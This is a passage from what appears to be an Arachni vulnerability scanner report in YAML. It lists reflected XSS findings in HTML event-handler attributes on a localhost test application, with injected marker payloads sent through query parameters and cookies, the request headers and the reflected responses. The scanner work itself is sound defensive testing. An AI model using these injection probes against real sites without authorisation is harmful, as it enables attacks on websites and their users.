    response: <a href='/' onmouseout=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseout</a><a href='/' onmouseout="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a><a href='/' onmouseout='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseout</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onmouseout?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onmouseover?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseover="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onmouseover?input=default
      :id: <a href="/" onmouseover="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseover=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseover</a><a href='/' onmouseover="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a><a href='/' onmouseover='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseover</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onmouseover?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onmouseup?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "421"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onmouseup?input=default
      :id: <a href="/" onmouseup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseup=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseup</a><a href='/' onmouseup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a><a href='/' onmouseup='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onmouseup?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/src?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "385"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" src="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/src?input=default
      :id: <a href="/" src="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' src=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>src</a><a href='/' src="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a><a href='/' src='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>src</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/src?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onload
  var: onload
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onload="default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
    injected: default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onload
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onload: default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onload: default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onload
      :id: <a href="/" onload="default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onload=default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onload</a><a href='/' onload="default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a><a href='/' onload='default-onload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onload
    var: onload
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onunload
  var: onunload
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onunload="default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
    injected: default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onunload
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onunload: default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onunload: default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onunload
      :id: <a href="/" onunload="default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onunload=default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onunload</a><a href='/' onunload="default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a><a href='/' onunload='default-onunload;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onunload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onunload
    var: onunload
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onblur
  var: onblur
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onblur="default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
    injected: default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onblur
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onblur: default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onblur: default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onblur
      :id: <a href="/" onblur="default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onblur=default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onblur</a><a href='/' onblur="default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a><a href='/' onblur='default-onblur;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onblur</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onblur
    var: onblur
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onchange
  var: onchange
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onchange="default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
    injected: default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onchange
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onchange: default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onchange: default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onchange
      :id: <a href="/" onchange="default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
